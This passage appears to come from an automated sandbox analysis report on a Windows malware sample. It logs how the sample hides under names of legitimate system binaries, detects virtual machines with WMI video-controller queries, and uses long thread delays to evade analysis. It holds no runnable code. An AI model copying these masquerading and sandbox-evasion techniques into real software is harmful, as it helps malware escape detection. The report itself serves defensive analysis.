            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeMemory allocated: 1180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeMemory allocated: 1AE60000 memory reserve | memory write watchJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeMemory allocated: 1720000 memory reserve | memory write watchJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeMemory allocated: 1B2E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeMemory allocated: C90000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeMemory allocated: 1A980000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeMemory allocated: 2A60000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeMemory allocated: 1AE20000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeMemory allocated: 2DA0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeMemory allocated: 1AF40000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeMemory allocated: B90000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeMemory allocated: 1A8A0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: E00000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 1A980000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 1270000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 1ADF0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 1260000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 1AEC0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeMemory allocated: 9B0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeMemory allocated: 1A5E0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeMemory allocated: 1720000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeMemory allocated: 1AF60000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 11B0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 1AAF0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 600000
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599890
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599781
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599672
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599562
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599453
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599343
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599234
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599125
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599015
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598906
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598797
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598687
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598578
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598468
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598356
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598248
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599875
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599765
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599656
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599547
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599437
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599328
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599218
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599109
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599000
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598890
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598781
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598671
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598562
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598453
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598343
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598234
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599890
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599781
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599672
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599563
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599453
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599344
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599234
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599125
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599013
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598906
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598797
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598686
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598578
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598267
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598141
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599875
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599765
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599654
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599531
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599421
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599312
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599203
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599094
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598969
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598859
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598750
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598640
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598531
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598422
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598312
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598203
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWindow / User API: threadDelayed 974Jump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWindow / User API: threadDelayed 1030Jump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 411Jump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 609Jump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWindow / User API: threadDelayed 366Jump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWindow / User API: threadDelayed 364Jump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWindow / User API: threadDelayed 367
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWindow / User API: threadDelayed 366
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWindow / User API: threadDelayed 367
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 366
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 870
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 462
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 495
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWindow / User API: threadDelayed 1582
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWindow / User API: threadDelayed 3385
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWindow / User API: threadDelayed 1304
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWindow / User API: threadDelayed 3824
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWindow / User API: threadDelayed 1469
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWindow / User API: threadDelayed 2490
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 1930
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWindow / User API: threadDelayed 2373
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe TID: 3300Thread sleep count: 974 > 30Jump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe TID: 3300Thread sleep count: 1030 > 30Jump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe TID: 5912Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe TID: 5896Thread sleep count: 411 > 30Jump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe TID: 5676Thread sleep count: 609 > 30Jump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe TID: 3220Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 4508Thread sleep count: 366 > 30Jump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 7140Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 6792Thread sleep count: 364 > 30Jump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5176Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 2036Thread sleep count: 222 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 3052Thread sleep count: 165 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 7012Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 4052Thread sleep count: 367 > 30
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 3004Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 5960Thread sleep count: 366 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 5764Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 1460Thread sleep count: 367 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 5388Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 7068Thread sleep count: 366 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 2968Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 6316Thread sleep count: 870 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 4780Thread sleep count: 115 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 672Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5272Thread sleep count: 462 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 6568Thread sleep count: 495 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 1424Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599890s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599781s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599672s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599562s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599453s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599343s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599234s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599125s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -599015s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598906s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598797s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598687s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598578s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598468s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598356s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660Thread sleep time: -598248s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 6492Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 4188Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5924Thread sleep count: 1304 > 30
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 1908Thread sleep count: 3824 > 30
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599875s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599765s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599656s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599547s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599437s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599328s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599218s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599109s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -599000s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598890s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598781s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598671s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598562s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598453s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598343s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316Thread sleep time: -598234s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 1540Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 4052Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2912Thread sleep count: 1469 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2912Thread sleep count: 2490 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -13835058055282155s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599890s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599781s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599672s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599563s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599453s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599344s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599234s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599125s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -599013s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -598906s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -598797s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -598686s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -598578s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -598267s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404Thread sleep time: -598141s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2308Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 6956Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2912Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 7028Thread sleep count: 1930 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 1216Thread sleep count: 2373 > 30
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599875s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599765s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740Thread sleep time: -599654s >= -30000s
